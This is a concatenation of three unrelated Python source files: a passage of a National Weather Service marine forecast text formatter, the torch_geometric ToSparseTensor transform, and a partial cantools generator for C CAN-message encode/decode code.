def phrase_descriptor_dict(self, tree, node):
dict = TextRules.TextRules.phrase_descriptor_dict(self, tree, node)
dict["Wind"] = "wind"
dict["around"] = ""
return dict
def null_nlValue_dict(self, tree, node):
# Threshold below which values are considered "null" and not reported.
# Units depend on the element and product
dict = TextRules.TextRules.null_nlValue_dict(self, tree, node)
dict["Wind"] = 5
return dict
def first_null_phrase_dict(self, tree, node):
# Phrase to use if values THROUGHOUT the period or
# in the first period are Null (i.e. below threshold OR NoWx)
# E.g. LIGHT WINDS. or LIGHT WINDS BECOMING N 5 MPH.
dict = TextRules.TextRules.first_null_phrase_dict(self, tree, node)
dict["Wind"] = "variable winds 10 knots or less"
return dict
def null_phrase_dict(self, tree, node):
# Phrase to use for null values in subPhrases other than the first
# Can be an empty string
# E.g. "NORTH 20 to 25 KNOTS BECOMING LIGHT"
dict = TextRules.TextRules.null_phrase_dict(self, tree, node)
dict["Wind"] = "variable 10 knots or less"
dict["Wx"] = ""
return dict
def marine_wind_flag(self, tree, node):
# If 1, Wind combining and wording will reflect the
# crossing of significant thresholds such as gales
return 1
def marine_wind_combining_flag(self, tree, node):
# If 1, Wind combining will reflect the
# crossing of significant thresholds such as gales.
# E.g. "Hurricane force winds to 100 knots." instead of
# "north hurricane force winds to 100 knots easing to
# hurricane force winds to 80 knots in the afternoon."
return 1
def postProcessPhrases(self, tree, node):
words = node.get("words")
if words is not None:
words = string.replace(words, "thunderstorms and rain showers",
"showers and thunderstorms")
words = string.replace(words, "snow showers and rain showers", "rain and snow showers")
words = string.replace(words, "rain showers and snow showers", "rain and snow showers")
#print "words = ", words
words = string.replace(words, "light rain showers", "rain showers")
words = string.replace(words, "rain showers", "showers")
#print "words 2= ", words
words = string.replace(words, "winds hurricane", "hurricane")
words = string.replace(words, "winds gales", "gales")
words = string.replace(words, "winds storm", "storm")
words = string.replace(words, "to to", "to")
words = string.replace(words, "winds 10 knots", "winds around 10 knots")
words = string.replace(words, "winds 5 knots", "winds around 5 knots")
words = string.replace(words, "and chance of", "and a chance of")
return self.setWords(node, words)
def rounding_method_dict(self, tree, node):
# Special rounding methods
#
return {
"Wind": self.marineRounding,
}
def scalar_difference_nlValue_dict(self, tree, node):
# Scalar difference. If the difference between scalar values
# for 2 sub-periods is greater than or equal to this value,
# the different values will be noted in the phrase.
dict = TextRules.TextRules.scalar_difference_nlValue_dict(self, tree, node)
dict["WaveHeight"] = {
(0, 6) : 1,
(6, 20) : 5,
'default': 10,
}
return dict
def minimum_range_nlValue_dict(self, tree, node):
# This threshold is the "smallest" min/max difference allowed between values reported.
# For example, if threshold is set to 5 for "MaxT", and the min value is 45
# and the max value is 46, the range will be adjusted to at least a 5 degree
# range e.g. 43-48. These are the values that are then submitted for phrasing
# such as:
# HIGHS IN THE MID 40S
dict = TextRules.TextRules.minimum_range_nlValue_dict(self, tree, node)
dict["Wind"] = {
(0,5) : 0, # will be reported as "null"
(5, 8) : 5,
"default" : 10,
}
return dict
########################################################################
# COMPONENT PRODUCT DEFINITIONS
########################################################################
def _PoP_analysisMethod(self, componentName):
# Alternative PoP analysis methods for consistency between PoP and Wx
return self.stdDevMaxAvg
#return self.maxMode
#return self.maximum
def NSHFirstPeriod(self):
return {
"type": "phrase",
"methodList": [
self.consolidateSubPhrases,
self.assemblePhrases,
self.postProcessPhrases,
self.wordWrap,
],
"analysisList": [
#("Wind", self.vectorMinMax, [3]),
("Wind", self.vectorMinMax, [4]),
#("WindGust", self.maximum, [3]),
("WindGust", self.maximum, [6]),
("WaveHeight", self.minMax, [3]),
("Wx", self.rankedWx, [6]),
("T", self.minMax),
("Sky", self.avg, [6]),
("PoP", self._PoP_analysisMethod("NSHFirstPeriod"), [6]),
("PoP", self.binnedPercent, [6]),
],
"phraseList":[
# WINDS
self.marine_wind_withGusts_phrase,
# Alternative:
#self.marine_wind_phrase,
#self.gust_phrase,
# WEATHER
self.weather_orSky_phrase,
self.visibility_phrase,
# WAVES
self.waveHeight_phrase,
# Optional:
#self.chop_phrase,
],
"lineLength": 66,
"runTimeEditArea": "yes",
}
def NSHPeriod(self):
return {
"type": "phrase",
"methodList": [
self.consolidateSubPhrases,
self.assemblePhrases,
self.postProcessPhrases,
self.wordWrap,
],
"analysisList": [
#("Wind", self.vectorMinMax, [3]),
("Wind", self.vectorMinMax, [4]),
#("WindGust", self.maximum, [3]),
("WindGust", self.maximum, [6]),
("WaveHeight", self.minMax, [3]),
("Wx", self.rankedWx, [6]),
("T", self.minMax),
("Sky", self.avg, [6]),
("PoP", self._PoP_analysisMethod("NSHPeriod"), [6]),
("PoP", self.binnedPercent, [6]),
],
"phraseList":[
# WINDS
self.marine_wind_withGusts_phrase,
# Alternative:
#self.marine_wind_phrase,
#self.gust_phrase,
# WEATHER
self.weather_orSky_phrase,
self.visibility_phrase,
# WAVES
self.waveHeight_phrase,
# Optional:
#self.chop_phrase,
#outlook phrase
self._warnOutlook_phrase,
],
"lineLength": 66,
"runTimeEditArea": "yes",
}
def generateForecast(self, argDict):
# Get variables
error = self._getVariables(argDict)
if error is not None:
return error
# Get the areaList -- derived from defaultEditAreas and
# may be solicited at run-time from user if desired
self._areaList = self.getAreaList(argDict)
if len(self._areaList) == 0:
return "WARNING -- No Edit Areas Specified to Generate Product."
# Determine time ranges
error = self._determineTimeRanges(argDict)
if error is not None:
return error
# Sample the data
error = self._sampleData(argDict)
if error is not None:
return error
# Initialize the output string
fcst = ""
fcst = self._preProcessProduct(fcst, argDict)
# Generate the product for each edit area in the list
fraction = 0
fractionOne = 1.0/float(len(self._areaList))
percent = 50.0
self.setProgressPercentage(percent)
for editArea, areaLabel in self._areaList:
self.progressMessage(fraction, percent, "Making Product for " + areaLabel)
fcst = self._preProcessArea(fcst, editArea, areaLabel, argDict)
fcst = self._makeProduct(fcst, editArea, areaLabel, argDict)
fcst = self._postProcessArea(fcst, editArea, areaLabel, argDict)
fraction = fractionOne
fcst = self._postProcessProduct(fcst, argDict)
return fcst
def _getVariables(self, argDict):
#part below is to eliminate time prompt added by Meade
# Get Definition variables
self._definition = argDict["forecastDef"]
for key in self._definition.keys():
exec "self._" + key + "= self._definition[key]"
localtime = time.localtime(argDict['creationTime'])
localHour = localtime[3]
self._setProductIssuance(localHour)
# Get VariableList and _issuance_list variables
varDict = argDict["varDict"]
for key in varDict.keys():
if type(key) is types.TupleType:
label, variable = key
exec "self._" + variable + "= varDict[key]"
self._format = "Standard"
self._extended = "Without Extended"
self._language = argDict["language"]
# Make argDict accessible
self.__argDict = argDict
return None
def _determineTimeRanges(self, argDict):
# Set up the Narrative Definition and initial Time Range
self._issuanceInfo = self.getIssuanceInfo(
self._productIssuance, self._issuance_list(argDict))
self._timeRange = self._issuanceInfo.timeRange()
argDict["productTimeRange"] = self._timeRange
self._expireTime = self._issuanceInfo.expireTime()
self._issueTime = self._issuanceInfo.issueTime()
self._definition["narrativeDef"] = self._issuanceInfo.narrativeDef()
if self._periodCombining:
self._definition["methodList"] = \
[self.combineComponentStats, self.assembleChildWords]
else:
self._definition["methodList"] = [self.assembleChildWords]
self._definition["priorPeriod"] = 24
# Calculate current times
self._ddhhmmTime = self.getCurrentTime(
argDict, "%d%H%M", shiftToLocal=0, stripLeading=0)
self._timeLabel = self.getCurrentTime(
argDict, "%l%M %p %Z %a %b %e %Y", stripLeading=1)
return None
def _sampleData(self, argDict):
# Sample and analyze the data for the narrative
self._narrativeProcessor = ForecastNarrative.ForecastNarrative()
error = self._narrativeProcessor.getNarrativeData(
argDict, self._definition, self._timeRange, self._areaList, self._issuanceInfo)
if error is not None:
return error
return None
def _preProcessProduct(self, fcst, argDict):
if self._areaName != "":
productName = self._productName.strip() + " for " + \
self._areaName.strip()
else:
productName = self._productName.strip()
issuedByString = self.getIssuedByString()
productName = self.checkTestMode(argDict, productName)
s = self._wmoID + " " + self._fullStationID + " " + \
self._ddhhmmTime + "\n" + self._pil + "\n\n"
fcst = fcst + s.upper()
s = productName + "\n" +\
"National Weather Service " + self._wfoCityState + \
"\n" + issuedByString + self._timeLabel + "\n\n"
fcst = fcst + s
fcst = fcst + self._lakeStmt(argDict) + "\n\n"
fcst = fcst + self._Text1()
return fcst
def _preProcessArea(self, fcst, editArea, areaLabel, argDict):
areaHeader = self.makeAreaHeader(
argDict, areaLabel, self._issueTime, self._expireTime,
self._areaDictionary, self._defaultEditAreas)
fcst = fcst + areaHeader
# get the hazards text
self._hazards = argDict['hazards']
self._combinations = argDict["combinations"]
headlines = self.generateProduct("Hazards", argDict, area = editArea,
areaLabel=areaLabel,
timeRange = self._timeRange)
fcst = fcst + headlines
return fcst
def _makeProduct(self, fcst, editArea, areaLabel, argDict):
# Produce Headline product
argDict["language"] = self._language
# Generate Narrative Forecast for Edit Area
fcstSegment = self._narrativeProcessor.generateForecast(
argDict, editArea, areaLabel)
# Handle abbreviations
if self._useAbbreviations == 1:
fcstSegment = self.marine_abbreviateText(fcstSegment)
fcstSegment = re.sub(r'\n', r' ',fcstSegment)
fcstSegment = re.sub(r' (\.[A-Za-z])', r'\n\1',fcstSegment)
fcstSegment = self.endline(fcstSegment, linelength=self._lineLength)
fcst = fcst + fcstSegment
return fcst
def _postProcessArea(self, fcst, editArea, areaLabel, argDict):
fcst = fcst + self._Text2()
fcst = fcst + self._Text3()
return fcst + "\n$$\n\n"
def _postProcessProduct(self, fcst, argDict):
self.setProgressPercentage(100)
self.progressMessage(0, 100, self._displayName + " Complete")
return fcst
########################################################################
# PRODUCT-SPECIFIC METHODS
########################################################################
def _setProductIssuance(self, localHour):
if localHour >= 0 and localHour <= 8:
self._productIssuance = "430 AM"
elif localHour > 8 and localHour <= 13:
self._productIssuance = "Morning Update"
elif localHour > 13 and localHour <= 18:
self._productIssuance = "430 PM"
else:
self._productIssuance = "Evening Update"
def _issuance_list(self, argDict):
# This method sets up configurable issuance times with associated
# narrative definitions. See the Text Product User Guide for documentation.
narrativeDefAM = [
("NSHFirstPeriod", "period1"), ("NSHPeriod", 12), ("NSHPeriod", 12), ("NSHPeriod", 12),
# ("NSHExtended", 24), ("NSHExtended", 24), ("NSHExtended", 24),
]
narrativeDefPM = [
("NSHFirstPeriod", "period1"), ("NSHPeriod", 12), ("NSHPeriod", 12), ("NSHPeriod", 12),
# ("NSHExtended", 24), ("NSHExtended", 24), ("NSHExtended", 24),
]
return [
("430 AM", self.DAY(), self.NIGHT(), 11,
".TODAY...", "early in the morning", "late in the afternoon",
1, narrativeDefAM),
("Morning Update", "issuanceHour", self.NIGHT(), 17,
".THIS AFTERNOON...", "early", "late",
1, narrativeDefAM),
# End times are tomorrow:
("430 PM", self.NIGHT(), 24 + self.DAY(), 23,
".TONIGHT...", "late in the night", "early in the evening",
1, narrativeDefPM),
("Evening Update", "issuanceHour", 24 + self.DAY(), 24+5,
".OVERNIGHT...", "toward daybreak", "early in the evening",
1, narrativeDefPM),
]
def lateDay_descriptor(self, tree, node, timeRange):
# If time range is in the first period, return period1 descriptor for
# late day -- default 3pm-6pm
if self._issuanceInfo.period1TimeRange().contains(timeRange):
return self._issuanceInfo.period1LateDayPhrase()
else:
return "late in the afternoon"
def lateNight_descriptor(self, tree, node, timeRange):
# If time range is in the first period, return period1 descriptor for
# late night -- default 3am-6am
if self._issuanceInfo.period1TimeRange().contains(timeRange):
return self._issuanceInfo.period1LateNightPhrase()
else:
return "early in the morning"
def splitDay24HourLabel_flag(self, tree, node):
# Return 0 to have the TimeDescriptor module label 24 hour periods
# with simply the weekday name (e.g. Saturday)
# instead of including the day and night periods
# (e.g. Saturday and Saturday night)
# NOTE: If you set this flag to 1, make sure the "nextDay24HourLabel_flag"
# is set to zero.
# NOTE: This applied only to periods that are exactly 24-hours in length.
# Periods longer than that will always be split into day and night labels
# (e.g. SUNDAY THROUGH MONDAY NIGHT)
compName = node.getComponentName()
if compName == "NSHExtended":
return 0
else:
return 1
def significant_wx_visibility_subkeys(self, tree, node):
# Weather values that constitute significant weather to
# be reported regardless of visibility.
# If your visibility_wx_threshold is None, you do not need
# to set up these subkeys since weather will always be
# reported.
# Set of tuples of weather key search tuples in the form:
# (cov type inten)
# Wildcards are permitted.
return [("* *")]
########################################################################
# OVERRIDING METHODS
########################################################################
def _warnOutlook_phrase(self):
return {
"phraseMethods": [
self._warnOutlook_words, # phrase.words
],
}
def _warnOutlook_words(self, tree, phrase):
# will put an outlook phrase in the text
windStats = tree.stats.get("Wind", phrase.getTimeRange(), mergeMethod="Max")
if windStats is None:
return self.setWords(phrase, "")
max, dir = windStats
words = ""
if max >= 23 and (self._outlookflag != 1):
words = "a small craft advisory may be needed"
self._outlookflag = 1
if max >= 34 and (self._outlookflag != 2):
words = "a gale warning may be needed"
self._outlookflag = 2
if max >= 48 and (self._outlookflag != 3):
words = "a storm warning may be needed"
self._outlookflag = 3
if max >= 64 and (self._outlookflag != 4):
self._outlookflag = 4
words = "a hurricane force wind warning may be needed"
if max < 23:
words = ""
self._outlookflag = 0
return self.setWords(phrase, words)
# Returns a list of the Hazards allowed for this product in VTEC format.
# These are sorted in priority order - most important first.
def allowedHazards(self):
allActions = ["NEW", "EXA", "EXB", "EXT", "CAN", "CON", "EXP"]
marineActions = ["NEW", "EXA", "EXB", "EXT", "CON"]
return [
('HF.A', marineActions, 'Marine'), # HURRICANE FORCE WIND WATCH
('SR.A', marineActions, 'Marine'), # STORM WATCH
('GL.A', marineActions, 'Marine'), # GALE WATCH
('SE.A', marineActions, 'Marine'), # HAZARDOUS SEAS
('UP.A', allActions, 'IceAccr'), # HEAVY FREEZING SPRAY WATCH
('HF.W', marineActions, 'Marine'), # HURRICANE FORCE WIND WARNING
('SR.W', marineActions, 'Marine'), # STORM WARNING
('GL.W', marineActions, 'Marine'), # GALE WARNING
('SE.W', marineActions, 'Marine'), # HAZARDOUS SEAS
('UP.W', allActions, 'IceAccr'), # HEAVY FREEZING SPRAY WARNING
('RB.Y', allActions, 'Marine'), #ROUGH BAR
('SI.Y', allActions, 'Marine'), #SMALL CRAFT ADVISORY
('SC.Y', allActions, 'Marine'), # SMALL CRAFT ADVISORY
('SW.Y', allActions, 'Marine'), # SMALL CRAFT ADVISORY
('BW.Y', allActions, 'Marine'), # BRISK WIND ADVISORY
('MF.Y', allActions, 'Fog'), # DENSE FOG ADVISORY
('MS.Y', allActions, 'Smoke'), # DENSE SMOKE ADVISORY
('UP.Y', allActions, 'IceAccr'), # HEAVY FREEZING SPRAY ADVISORY
('MH.W', allActions, 'Ashfall'), # VOLCANIC ASHFALL WARNING
('MH.Y', allActions, 'Ashfall'), # VOLCANIC ASHFALL ADVISORY
('LO.Y', allActions, 'LowWater'), # LOW WATER ADVISORY
('TO.A', allActions, 'Convective'), # TORNADO WATCH
('SV.A', allActions, 'Convective'), # SEVERE THUNDERSTORM WATCH
]
|
python
|
from typing import Optional, Union
from torch_sparse import SparseTensor
from torch_geometric.data import Data, HeteroData
from torch_geometric.transforms import BaseTransform
from torch_geometric.utils import sort_edge_index
class ToSparseTensor(BaseTransform):
r"""Converts the :obj:`edge_index` attributes of a homogeneous or
heterogeneous data object into a (transposed)
    :class:`torch_sparse.SparseTensor` type with key :obj:`adj_t`.
.. note::
In case of composing multiple transforms, it is best to convert the
:obj:`data` object to a :obj:`SparseTensor` as late as possible, since
there exist some transforms that are only able to operate on
:obj:`data.edge_index` for now.
Args:
        attr (str, optional): The name of the attribute to add as a value to
the :class:`~torch_sparse.SparseTensor` object (if present).
(default: :obj:`edge_weight`)
remove_edge_index (bool, optional): If set to :obj:`False`, the
:obj:`edge_index` tensor will not be removed.
(default: :obj:`True`)
fill_cache (bool, optional): If set to :obj:`False`, will not fill the
underlying :obj:`SparseTensor` cache. (default: :obj:`True`)
"""
def __init__(self, attr: Optional[str] = 'edge_weight',
remove_edge_index: bool = True, fill_cache: bool = True):
self.attr = attr
self.remove_edge_index = remove_edge_index
self.fill_cache = fill_cache
def __call__(self, data: Union[Data, HeteroData]):
for store in data.edge_stores:
if 'edge_index' not in store:
continue
keys, values = [], []
for key, value in store.items():
if key == 'edge_index':
continue
if store.is_edge_attr(key):
keys.append(key)
values.append(value)
store.edge_index, values = sort_edge_index(store.edge_index,
values,
sort_by_row=False)
for key, value in zip(keys, values):
store[key] = value
store.adj_t = SparseTensor(
row=store.edge_index[1], col=store.edge_index[0],
value=None if self.attr is None or self.attr not in store else
store[self.attr], sparse_sizes=store.size()[::-1],
is_sorted=True)
if self.remove_edge_index:
del store['edge_index']
if self.attr is not None and self.attr in store:
del store[self.attr]
if self.fill_cache: # Pre-process some important attributes.
store.adj_t.storage.rowptr()
store.adj_t.storage.csr2csc()
return data
def __repr__(self) -> str:
return f'{self.__class__.__name__}()'
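# Example usage (a minimal sketch, assuming compatible torch_geometric and
# torch_sparse installs; the toy graph below is purely illustrative):
#
#   import torch
#   from torch_geometric.data import Data
#
#   edge_index = torch.tensor([[0, 1, 1, 2], [1, 0, 2, 1]])
#   data = Data(edge_index=edge_index, num_nodes=3)
#   data = ToSparseTensor()(data)
#   print(data.adj_t)  # transposed SparseTensor; edge_index has been removed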
|
python
|
from __future__ import print_function
import re
import time
from ...version import __version__
HEADER_FMT = '''\
/**
* The MIT License (MIT)
*
* Copyright (c) 2018 Erik Moqvist
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
/**
* This file was generated by cantools version {version} {date}.
*/
#ifndef {include_guard}
#define {include_guard}
#include <stdint.h>
#include <stdbool.h>
#include <unistd.h>
#ifndef EINVAL
# define EINVAL -22
#endif
{frame_id_defines}
{choices_defines}
{structs}
{declarations}
#endif
'''
SOURCE_FMT = '''\
/**
* The MIT License (MIT)
*
* Copyright (c) 2018 Erik Moqvist
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
/**
* This file was generated by cantools version {version} {date}.
*/
#include <string.h>
#include "{header}"
#define UNUSED(x) (void)(x)
#define ftoi(value) (*((uint32_t *)(&(value))))
#define itof(value) (*((float *)(&(value))))
#define dtoi(value) (*((uint64_t *)(&(value))))
#define itod(value) (*((double *)(&(value))))
{definitions}\
'''
STRUCT_FMT = '''\
/**
* Signals in message {database_message_name}.
*
{comments}
*/
struct {database_name}_{message_name}_t {{
{members}
}};
'''
DECLARATION_FMT = '''\
/**
* Encode message {database_message_name}.
*
* @param[out] dst_p Buffer to encode the message into.
* @param[in] src_p Data to encode.
* @param[in] size Size of dst_p.
*
* @return Size of encoded data, or negative error code.
*/
ssize_t {database_name}_{message_name}_encode(
uint8_t *dst_p,
const struct {database_name}_{message_name}_t *src_p,
size_t size);
/**
* Decode message {database_message_name}.
*
* @param[out] dst_p Object to decode the message into.
* @param[in] src_p Message to decode.
* @param[in] size Size of src_p.
*
* @return zero(0) or negative error code.
*/
int {database_name}_{message_name}_decode(
struct {database_name}_{message_name}_t *dst_p,
const uint8_t *src_p,
size_t size);
'''
IS_IN_RANGE_DECLARATION_FMT = '''\
/**
* Check that given signal is in allowed range.
*
* @param[in] value Signal to check.
*
* @return true if in range, false otherwise.
*/
bool {database_name}_{message_name}_{signal_name}_is_in_range({type_name} value);
'''
DEFINITION_FMT = '''\
ssize_t {database_name}_{message_name}_encode(
uint8_t *dst_p,
const struct {database_name}_{message_name}_t *src_p,
size_t size)
{{
{unused}\
{encode_variables}\
if (size < {message_length}) {{
return (-EINVAL);
}}
memset(&dst_p[0], 0, {message_length});
{encode_body}
return ({message_length});
}}
int {database_name}_{message_name}_decode(
struct {database_name}_{message_name}_t *dst_p,
const uint8_t *src_p,
size_t size)
{{
{unused}\
{decode_variables}\
if (size < {message_length}) {{
return (-EINVAL);
}}
memset(dst_p, 0, sizeof(*dst_p));
{decode_body}
return (0);
}}
'''
IS_IN_RANGE_DEFINITION_FMT = '''\
bool {database_name}_{message_name}_{signal_name}_is_in_range({type_name} value)
{{
{unused}\
return ({check});
}}
'''
EMPTY_DEFINITION_FMT = '''\
ssize_t {database_name}_{message_name}_encode(
uint8_t *dst_p,
const struct {database_name}_{message_name}_t *src_p,
size_t size)
{{
UNUSED(dst_p);
UNUSED(src_p);
UNUSED(size);
return (0);
}}
int {database_name}_{message_name}_decode(
struct {database_name}_{message_name}_t *dst_p,
const uint8_t *src_p,
size_t size)
{{
UNUSED(src_p);
UNUSED(size);
memset(dst_p, 0, sizeof(*dst_p));
return (0);
}}
'''
SIGN_EXTENSION_FMT = '''
if (dst_p->{name} & (1 << {shift})) {{
dst_p->{name} |= {mask};
}}
'''
SIGNAL_PARAM_COMMENT_FMT = '''\
* @param {name} Value as on the CAN bus.
{comment}\
* Range: {range}
* Scale: {scale}
* Offset: {offset}\
'''
def _canonical(value):
"""Replace anything but 'a-z', 'A-Z', '0-9' and '_' with '_'.
"""
return re.sub(r'\W', '_', value)
def _camel_to_snake_case(value):
value = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', value)
value = re.sub(r'(_+)', '_', value)
value = re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', value).lower()
value = _canonical(value)
return value
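# For illustration (hypothetical signal names):
#   _camel_to_snake_case('EngineSpeed') -> 'engine_speed'
#   _camel_to_snake_case('ABSActive')   -> 'abs_active'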
def _strip_blank_lines(lines):
try:
while lines[0] == '':
lines = lines[1:]
while lines[-1] == '':
lines = lines[:-1]
except IndexError:
pass
return lines
def _type_name(signal):
type_name = None
if signal.is_float:
if signal.length == 32:
type_name = 'float'
elif signal.length == 64:
type_name = 'double'
else:
print('warning: Floating point signal not 32 or 64 bits.')
else:
if signal.length <= 8:
type_name = 'int8_t'
elif signal.length <= 16:
type_name = 'int16_t'
elif signal.length <= 32:
type_name = 'int32_t'
elif signal.length <= 64:
type_name = 'int64_t'
else:
print('warning: Signal lengths over 64 bits are not yet supported.')
if type_name is not None:
if not signal.is_signed:
type_name = 'u' + type_name
return type_name
def _get_type_suffix(type_name):
try:
return {
'uint8_t': 'u',
'uint16_t': 'u',
'uint32_t': 'u',
'int64_t': 'll',
'uint64_t': 'ull',
'float': 'f'
}[type_name]
except KeyError:
return ''
def _get(value, default):
if value is None:
value = default
return value
def _minimum_type_value(type_name):
if type_name == 'int8_t':
return -128
elif type_name == 'int16_t':
return -32768
elif type_name == 'int32_t':
return -2147483648
elif type_name == 'int64_t':
return -9223372036854775808
elif type_name[0] == 'u':
return 0
else:
return None
def _maximum_type_value(type_name):
if type_name == 'int8_t':
return 127
elif type_name == 'int16_t':
return 32767
elif type_name == 'int32_t':
return 2147483647
elif type_name == 'int64_t':
return 9223372036854775807
elif type_name == 'uint8_t':
return 255
elif type_name == 'uint16_t':
return 65535
elif type_name == 'uint32_t':
return 4294967295
elif type_name == 'uint64_t':
return 18446744073709551615
else:
return None
def _format_comment(comment):
if comment:
return '\n'.join([
' * ' + line.rstrip()
for line in comment.splitlines()
]) + '\n'
else:
return ''
def _format_decimal(value, is_float=False):
if int(value) == value:
value = int(value)
if is_float:
return str(value) + '.0'
else:
return str(value)
else:
return str(value)
def _format_range(signal):
minimum = signal.decimal.minimum
maximum = signal.decimal.maximum
scale = signal.decimal.scale
offset = signal.decimal.offset
unit = _get(signal.unit, '-')
if minimum is not None and maximum is not None:
return '{}..{} ({}..{} {})'.format(
_format_decimal((minimum - offset) / scale),
_format_decimal((maximum - offset) / scale),
minimum,
maximum,
unit)
elif minimum is not None:
return '{}.. ({}.. {})'.format(
_format_decimal((minimum - offset) / scale),
minimum,
unit)
elif maximum is not None:
        return '..{} (..{} {})'.format(
_format_decimal((maximum - offset) / scale),
maximum,
unit)
else:
return '-'
def _generate_signal(signal):
type_name = _type_name(signal)
if type_name is None:
return None, None
name = _camel_to_snake_case(signal.name)
comment = _format_comment(signal.comment)
range_ = _format_range(signal)
scale = _get(signal.scale, '-')
offset = _get(signal.offset, '-')
comment = SIGNAL_PARAM_COMMENT_FMT.format(name=name,
comment=comment,
range=range_,
scale=scale,
offset=offset)
member = ' {} {};'.format(type_name, name)
return comment, member
def _signal_segments(signal, invert_shift):
index, pos = divmod(signal.start, 8)
left = signal.length
while left > 0:
if signal.byte_order == 'big_endian':
if left > (pos + 1):
length = (pos + 1)
pos = 7
shift = -(left - length)
mask = ((1 << length) - 1)
else:
length = left
mask = ((1 << length) - 1)
if (pos - length) >= 0:
shift = (pos - length + 1)
else:
shift = (8 - left)
mask <<= (pos - length + 1)
else:
if left >= (8 - pos):
length = (8 - pos)
shift = (left - signal.length) + pos
mask = ((1 << length) - 1)
mask <<= pos
pos = 0
else:
length = left
mask = ((1 << length) - 1)
shift = pos
mask <<= pos
if invert_shift:
if shift < 0:
shift = '<< {}'.format(-shift)
else:
shift = '>> {}'.format(shift)
else:
if shift < 0:
shift = '>> {}'.format(-shift)
else:
shift = '<< {}'.format(shift)
yield index, shift, mask
left -= length
index += 1
def _format_encode_code_mux(message,
mux,
body_lines_per_index,
variable_lines,
conversion_lines):
signal_name, multiplexed_signals = list(mux.items())[0]
_format_encode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
multiplexed_signals_per_id = sorted(list(multiplexed_signals.items()))
signal_name = _camel_to_snake_case(signal_name)
lines = [
'',
'switch (src_p->{}) {{'.format(signal_name)
]
for multiplexer_id, multiplexed_signals in multiplexed_signals_per_id:
body_lines = _format_encode_code_level(message,
multiplexed_signals,
variable_lines)
lines.append('')
lines.append('case {}:'.format(multiplexer_id))
if body_lines:
lines.extend(body_lines[1:-1])
lines.append(' break;')
lines.extend([
'',
'default:',
' break;',
'}'])
return [(' ' + line).rstrip() for line in lines]
def _format_encode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines):
signal = message.get_signal_by_name(signal_name)
signal_name = _camel_to_snake_case(signal_name)
if signal.is_float:
if signal.length == 32:
variable = ' uint32_t {};'.format(signal_name)
conversion = ' {0} = ftoi(src_p->{0});'.format(signal_name)
else:
variable = ' uint64_t {};'.format(signal_name)
conversion = ' {0} = dtoi(src_p->{0});'.format(signal_name)
variable_lines.append(variable)
conversion_lines.append(conversion)
for index, shift, mask in _signal_segments(signal, False):
if index not in body_lines_per_index:
body_lines_per_index[index] = []
if signal.is_float:
fmt = ' dst_p[{}] |= (({} {}) & 0x{:02x});'
else:
fmt = ' dst_p[{}] |= ((src_p->{} {}) & 0x{:02x});'
line = fmt.format(index, signal_name, shift, mask)
body_lines_per_index[index].append(line)
def _format_encode_code_level(message,
signal_names,
variable_lines):
"""Format one encode level in a signal tree.
"""
body_lines_per_index = {}
conversion_lines = []
muxes_lines = []
for signal_name in signal_names:
if isinstance(signal_name, dict):
mux_lines = _format_encode_code_mux(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
muxes_lines += mux_lines
else:
_format_encode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
body_lines = []
for index in sorted(body_lines_per_index):
body_lines += body_lines_per_index[index]
if conversion_lines:
conversion_lines += ['']
body_lines = conversion_lines + body_lines + muxes_lines
if body_lines:
body_lines = [''] + body_lines + ['']
return body_lines
def _format_encode_code(message):
variable_lines = []
body_lines = _format_encode_code_level(message,
message.signal_tree,
variable_lines)
if variable_lines:
variable_lines += ['', '']
return '\n'.join(variable_lines), '\n'.join(body_lines)
def _format_decode_code_mux(message,
mux,
body_lines_per_index,
variable_lines,
conversion_lines):
signal_name, multiplexed_signals = list(mux.items())[0]
_format_decode_code_signal(message,
signal_name,
body_lines_per_index,
variable_lines,
conversion_lines)
multiplexed_signals_per_id = sorted(list(multiplexed_signals.items()))
signal_name = _camel_to_snake_case(signal_name)
lines = [
'switch (dst_p->{}) {{'.format(signal_name)
]
for multiplexer_id, multiplexed_signals in multiplexed_signals_per_id:
body_lines = _format_decode_code_level(message,
multiplexed_signals,
variable_lines)
lines.append('')
lines.append('case {}:'.format(multiplexer_id))
lines.extend(_strip_blank_lines(body_lines))
lines.append(' break;')
lines.extend([
'',
'default:',
' break;',
'}'])
return [(' ' + line).rstrip() for line in lines]
